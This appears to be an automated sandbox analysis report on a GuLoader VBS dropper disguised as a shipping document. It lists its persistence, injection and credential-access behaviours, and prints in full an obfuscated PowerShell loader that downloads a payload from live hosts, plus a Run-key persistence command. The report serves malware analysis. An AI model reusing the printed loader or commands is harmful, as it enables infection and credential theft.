Analysis Overview
SHA256
5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66
Threat Level: Known bad
The file 21052024_1445_Shipping Document.vbs was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
NirSoft WebBrowserPassView
NirSoft MailPassView
Nirsoft
Blocklisted process makes network request
Checks computer location settings
Adds Run key to start application
Accesses Microsoft Outlook accounts
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: MapViewOfSection
Modifies registry key
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-21 14:45
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-21 14:45
Reported
2024-05-21 14:48
Platform
win7-20240508-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\Antodontalgic = "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\\Sojaskraaets\\').Afdryp;%Peritenon% ($Intermorainic)" | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2672 set thread context of 1320 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21052024_1445_Shipping Document.vbs"
C:\Windows\System32\cmd.exe
cmd.exe /c ping 6777.6777.6777.677e
C:\Windows\system32\PING.EXE
ping 6777.6777.6777.677e
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. ';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Dokumentationsniveaus = 1;$Hjemegn='Sub';$Hjemegn+='strin';$Hjemegn+='g';Function Pugmiller27($Afficerer){$Fjaserierne=$Afficerer.Length-$Dokumentationsniveaus;For($Semimythically=7;$Semimythically -lt $Fjaserierne;$Semimythically+=8){$Formidabel+=$Afficerer.$Hjemegn.Invoke( $Semimythically, $Dokumentationsniveaus);}$Formidabel;}function Skuffemblers80($Nundination){& ($Fiberizes) ($Nundination);}$Riches=Pugmiller27 'Unfea iMGert,udote.zinazidemndeiSkulderlKejserelKullereaM,squaw/ ranule5Uv.denh.Indsigt0 Teapoy Apsisex(ForsamlWVermicuiNrbanekn Opkal,d SkoleeoD.pnoouwDe.icatsBrushwo PreintoNBnkeradTSurdent Unceles1Tyndta.0Sco,ogg. Drm ea0Interwr; Papegj U.kikkeWPresse iBaggingnPhenopl6Moskgae4Rystnin;Cor.ado EnteroxProgram6Fleligt4Sco nin; Minesw Trif.crU,ikresvIffritt:Gigoloe1 fdestu2Dreamer1Skridso. Stoppe0 rg jle)Diatom. Biog.apGDrivbnkeDietalacTonkawakParenteoAdditum/Anjo mo2A.rmong0Bayrern1hypotak0befordr0Sabb,ti1Eksamen0Teltsla1Seksten UdvideFattraktiChol.dorDrawcaneStrmperfIffcoluoT dstavxAmphict/Coe.uca1Geologi2Discipl1App,rte. Job,gn0D.hydro ';$hermae=Pugmiller27 'CivilisUBefohsfsBjergtoeBe,onkorforlyst-DykkedeAForflytgVicedireKassatin vsprintFllesud ';$Klippespalternes=Pugmiller27 'Recoillh StringtPist rstMercer pUninfri:Fright./tel mec/BrabblimWrannyfa LinenidPogoniaiOver apbBeraabea,lirtatrAn.iqueoMellemrhNonfluii.mpalealPejlevoaTermin lArithmoa Cari.ot BellahwTidssero Harpoo.VanddradPennefjuIsocy ncPaakldek Moorhed Selvbyn.sentrosMessing.Sele,ogomarkedsr Arti egKuldslo/L,vetraaOverspelMa,nedsl Fo,bru/ChristeOreassumvForgr beTikroner ethavepFoilingrBilophuoHar isttPrivataeUnkindlcDieucontTetraheeVilipendAuto.at.BrtternaPaduanisHurtigvdKnownsb>grundprhUnsu,pltReaffiltFreewompDren hesPamphar: Optje./ Kendin/Rigsar.csolilo a HelgesdFranckceLatinamnMundgodaOvercledcutleriePi,dymcr Forstre Vandfog Allitea.mhyggelHen,ikkoDiatonisGunsh t.IsagogicHortikuoKorskirm Fortri/HelmintO SamlinvIsoc ateForbo.sr kursusp Alc horDi,konioParopsitBrokkaseRegrassc KlebrntVaccinaeAchigandDmninge. DiskanaBal,erdsDampededMisc nc ';$Indeksnavnenes=Pugmiller27 'Horeu,g> Neckb. ';$Fiberizes=Pugmiller27 ' AsperiiUnderlaeUdslusax.ialogu ';$unfashionably='Underste';$Ndringsloven = Pugmiller27 'VernacueAntistrcFornufthKu.isshoEstabli Unlamen%YvindasaAfstr.spEvaporapFirspand K shmia CircumtStalagmaSolvarm%trichin\T gthusDFestdagrOuttopiothackerh Dronis.G.ggereL Bem.leiKonsul tDisbury Mimusop&unjo tl& Unrefr ExclusieP,ovedicPa aesthPholioto Boroca NonmanutHousebo ';Skuffemblers80 (Pugmiller27 ' Brevve$Sibyllig E.keltlasylth,oBo.genebAphanesaNonm.rrlstedfas: sermonRHjemvisaErgotizaTyp,husgPastelfeBrightnr BravoenSold teeOwl ike=unplaya(Overcolc mbitiomPaternid,ersali Idealit/ Sprackc tekedy Westli$System.NPhotomud registrDetermiiPistrixnTr.thsmgTomensvsThu.nidltilkendoSkarnbtvStyrekae.andelsn.ongres)R.ndvis ');Skuffemblers80 (Pugmiller27 'Gullery$BasilikgOntologll enabloMembranbCommulaaReprodulHjarnea:RuefulnI SaxaulnSkyd.spdBrugerdsDyrepareParkerinKbenhavs astodo=St dent$WummanaKU,etemallasterni.mutterpfam,etcpObjektke ApoteksS miwoopHolishkaPh tolalovergo,tFlberieeThirtyirMinisten,rydreheKn.vsmesNeder.e.AlarmsysChrist.pSt rgeolWhiteshiPr endetProsaen(Menings$K.lkulaIKvadratnIn.ectid AnteceeNonascekDigitissFortrngnPicturiaudbruddv SpulinnReguarde Positin Mowedee,pachets,acefor)Affodre ');$Klippespalternes=$Indsens[0];$Konstantnavn= (Pugmiller27 ',yrebes$Beboedeg A,rsoplObtestioLnniveab C ntriaHerm.lil Dr.van:K igsmaK Rec mpaDuksedrmBroekdee ,nderueFolk,krnApprokssWaiseja=OtogeniNSpi ekkeLangeelw T.angs-FlleskoOAlmachsb Raspedj SkittleKillybecKi,debatJordarv .dresseS i.deteyAgrologsJagterntSemiboue HissermSlu bet. SubfesNSubemareOmraadetSaliggr.UniseriWsh pyareOxytocib W stelCUneve,tlArkfdniiDaasellehave.usnreptilit');$Konstantnavn+=$Raagerne[1];Skuffemblers80 ($Konstantnavn);Skuffemblers80 (Pugmiller27 'Geother$W,odburKIntercaaSpytkirmMusicaleFormalieStoppegn,uperdesdiminut.snevejrHSammenseRewrit,a Nonundd Unskele Gtefolr brusqusSkattep[Desa in$C.rrupthOmbreudePlemoc,r Dobbelm DisomaaCalandeeIndif e]Saltant= Tri ul$Cons,raR krdderiSouthercPrognoshTe,moeleHalvakssMe.amor ');$Tripotassium=Pugmiller27 ' Pakist$NondecaKSpidsfiaComm.ndmEpriseteCorrespe MysticnTekstilsfkalieo.Beb,erdDUn,roroospan,shwWallisen JennielSelvbedoBrndvrdaInversedevadingFf stooniTrst.splGaulicwe.versig(grubers$Sad lecKM oledelH.lvstui krep,apGipsdeppJugglineGodken,sAngelinpScund ra SinterlRaffeeptOxamidie Gr.vkerBelaaninSugefiseIndrmmes Convey,Pupilla$ ,udekoUN.kedrmdUnabusilTilgodebBodenbesM.ddeltd Forjuda VasenbtAphrasioSprydsteUdsoninnVederhfsPloejer) Colpoh ';$Udlbsdatoens=$Raagerne[0];Skuffemblers80 (Pugmiller27 'Nabobye$UnsandagNonuncil OverdioKurs ikbtrianguaFore.oolBu dend:Aa.ningCLatou.saTempelrrI,ternayNonmen o Sp ntatFjernskiOleifernS,bstitsDiskva,=Preappe(ForvariTTomefuleExsectisChemophtEkvivok-PerduraP Samme aTranseqtF,rstrah Underg Detai l$SnkendeU Kal,kadP.oselylForktr,bc,nsumesHackersdcheckreaFaenometLovgi.no Zoo.eoeP etortnChaussfsantigra)Madrepo ');while (!$Caryotins) {Skuffemblers80 (Pugmiller27 'svineml$PirraurgBlas,rtlToldasso MarkrkbVariabeaCrassesl Udbeta:L.ppingEBeskuerkLu ningsSuba.paeBesty,emKunstkreWood,nltOmkldnis Fasci,=Bitters$.recooktSef kherBrandfouDgnmiddeFlels,s ') ;Skuffemblers80 $Tripotassium;Skuffemblers80 (Pugmiller27 'BugtedeSUnshaketGlanslsaHalberdrChaptalt.eposit- M chanSDyrtidslChyometeFimredeeEuorn,tp Ju,jub .frika4Optakts ');Skuffemblers80 (Pugmiller27 'Vandfor$TophuengLaconislDaysmeno GravhubGaintw,aHandbagl.igsadv:rrd.ummCStokerfaHeltenerLoranthyI.stalsoSammensttakstt.iRose.ben Unja ks P.ssma=Festrem(Bon efdTL,tfrdieFdevandsRv.ulletSkr ebl-UnassimP FormataYa.nerutauthorihBestemm Uninvag$InterpuUBathyspdudtrakdlHafterabElectros SeksaadStavlygaMilieu t ceneguoPrintm ePsykolonPred.spsAmorphi)Goldles ') ;Skuffemblers80 (Pugmiller27 'Lascivi$BlrenddgreusinglS,kterioHandlinb milliaa OmlgnilInterli:G eywarM.tdtrinaUdfrienrBullrags Briti h lomstmgatherfaMundat,nSemidom=Varnish$LeasinggScleroxlcompeteo ResaddbComplicaSpringbl Ko.sta:O.vejenBdisloadesto ebemImi ereospolet cObvia ikUnneedfeFunktiodCharc a+dehydre+Sovi ti%Immunes$BombardIAnge.linEhe,intdFolkboasBlousoneAnbefaln OptionsMisfie .l,kkericOrdtllioNattyfou atteagnLign ngtUigenne ') ;$Klippespalternes=$Indsens[$Marshman];}$Agonize=339107;$Simonies=30148;Skuffemblers80 (Pugmiller27 'Forlodc$T,rhildgRetrosplPolituro Undissb Ta,ernaShunpiklEngangs:RegenerUVgterpid lvfadm UdestorSrskrevkC lletyeIlliberl FlusmisDribleneKnibninnPedicel onaff=,oughta EverypG TrepaneNa.nemrtomphali- PonyerCbaggrunoBron efn C.rcumtSkrinlgeLarmedenfeberantKonst u Din.eno$UsurpatUAnkec.edForsatslOverflybrebokeasUnderstd Thiocya FrugivtMort,nsoCirrouseSamf,ndnG llaunsReagens ');Skuffemblers80 (Pugmiller27 'Rendezv$FiskestgScabblelKi esiooCae.arobFremskraVrikkerlLocater:TiggersqKontaktuStivelsoSutton,hSr,ilfloP,oduktg EvakuesChenea Reform=Instruk Forvaer[ PiscinSPleske.y Sombr sDemiskrtFodbreme LuggnamPost ox.OktanteCKv.rtetoFakturan.appeskvagariste statsgr ,ockettPlanlg.]Ga.rden:Tr oxaz:AbortioFTaabelirS bunguoInviolamOrtograBAthwarta fo,plisfir,steeUnfle,h6kope sa4 DialekSPuller t SigtekrBaggruniUnmaturnfrkapseg Iridin(Edder,o$Udlaan UGasserndPadouksmGrankogrJoeyshjkStemmeaeOutequilShillins Hy.ereeGetat,bnIndl.dt)Post or ');Skuffemblers80 (Pugmiller27 'Vowersk$ MeteorgSwankeyl BarbecoBe,iggebD,provia BalefulAutecol:P,emenoVTvr agseTysklanrArbejdsiFlaskehf Gaeld iNostradcLejeforeUnd.ferrMysticieRelik.irSax rne preio,i=Krepere Johnni,[KaalpaySPac.walyPromercsSkralunt dyrti,eAdditiomOssicul.sperminTGrothinePoly,ynxOctahedt opfind. Ko,torE SilentnFaradaycEpichoroUnexplod Unshari,vakuernFstendegNonchem]Grsrdde:Cardio,:BeskftiABaptistSBronchiC A ekseIOrlopdeISelvval. AlperoGTheow ee edagetUnblissSDob eltthjsangerNemmendiLod,ensnBrdteksgNor.eni(Hum.ris$Verna.uqSeaportu MicropoSvalinghSpl tteoBourgeogOrganiss Kontak)Kogespr ');Skuffemblers80 (Pugmiller27 'Jomsvi $videoplgReshuttlC remono SpolnibRooflinaFimre,elLastvog:PrinterAA,nsofin SkistatThenna.iBritas cRulammeiEdiblesvCivilisi Ch,orol Skuldr= Laanem$Salad nVHematozeMendicarRhabditiByggemof HuanaciProgrescSkummeteRaakalvrapert.reUngamblrSnobbis. Rel stsMiteredu N.drivb VoldtgsRee,ucatadmin,sr Reocc,iAarsagsnCommissgMantraf(,nlarge$ FeatheA Heterog fono.ooani,idinSkulpefiPlausibz S mmete betonk,Honilyj$FrostieSHuma.eaidattosrmhandf.sotolversnIrreguliSinistre RadiossPantheo)Jola,ta ');Skuffemblers80 $Anticivil;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 6777.6777.6777.677e | udp |
| US | 8.8.8.8:53 | madibarohilalatwo.duckdns.org | udp |
| DE | 84.247.187.12:80 | madibarohilalatwo.duckdns.org | tcp |
| US | 8.8.8.8:53 | cadenaderegalos.com | udp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
| US | 198.49.68.125:443 | cadenaderegalos.com | tcp |
